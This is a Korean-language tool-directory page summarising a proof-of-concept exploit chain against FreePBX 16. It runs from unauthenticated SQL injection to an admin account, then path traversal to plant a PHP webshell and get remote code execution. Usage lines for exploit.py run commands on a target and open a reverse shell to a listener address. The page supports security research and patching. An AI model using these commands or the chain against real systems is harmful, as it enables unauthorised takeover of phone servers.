Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-57819-RCE — CVE-2025-57819-RCE_PoC | Kitploit
도구/GitHubGitHub/teteren/cve-2025-57819-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubteteren/cve-2025-57819-rce

CVE-2025-57819-RCE

CVE-2025-57819-RCE_PoC

저장소 보기
19일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

FreePBX 16 — Unauthenticated SQLi to RCE요약: 이 설명은 FreePBX 16의 두 취약점(CVE-2025-57819 및 CVE-2025-61678)을 결합하여 인증되지 않은 액세스에서 원격 코드 실행(Remote Code Execution, RCE)으로 권한을 상승시키는 전체 공격 체인을 보여줍니다. 취약점 CVE 정보 CVE 번호 영향 구성 요소 영향 및 취약점 유형 CVE-2025-57819 Endpoint 모듈 로더(brand 매개변수) 인증되지 않은 다중 명령 SQL 주입(Unauthenticated Stacked SQL Injection) CVE-2025-61678 Endpoint Manager 펌웨어 업로드 처리기(fwbrand 매개변수) 인증된 임의 파일 업로드 / 경로 탐색(Path Traversal) 공격 원리 및 절차 관리자 계정 만들기(CVE-2025-57819) 네임스페이스 모듈 로더(Namespaced Endpoint Loader)를 통해 인증되지 않은 다중 명령 SQL 주입 취약점을 트리거하여 ampusers 데이터 테이블에 전체 권한을 가진 새로운 관리자 계정을 직접 작성합니다. 인증(Authentication) 방금 만든 관리자 계정 정보로 FreePBX 백엔드 관리 인터페이스에 로그인합니다. WebShell 작성(CVE-2025-61678) Endpoint Manager의 펌웨어 업로드 기능을 악용하고 fwbrand 매개변수의 경로 탐색 취약점(../../../var/www/html/

)과 결합하여 PHP WebShell을 웹 루트 디렉터리에 직접 작성합니다. 명령 실행(Execution) 배포된 WebShell을 호출하여 단일 시스템 명령을 실행하거나 대화형 Reverse Shell을 생성합니다. 영향받는 버전 및 수정 권장 사항 영향받는 버전: FreePBX 16(Endpoint 모듈 버전 16.0.92 미만) FreePBX 17(17.0.6 이전 버전에서 수정됨) 수정 권장 사항: 가능한 한 빨리 최신 패치 버전으로 업데이트하십시오. 사용 설명(Usage) Bash

執行單一指令

python3 exploit.py --rhost pbx.example.com --command "id"

建立互動式 Reverse Shell (利用 pwntools 自動監聽)

python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

使用 Plain HTTP 與自訂通訊埠

python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a" 매개변수 설명(Options) 매개변수 설명 --rhost [필수] 대상 호스트 주소(Target Host) --rport 대상 통신 포트(기본값: 443) --http 기본 HTTPS 대신 HTTP를 강제로 사용

도구 다운로드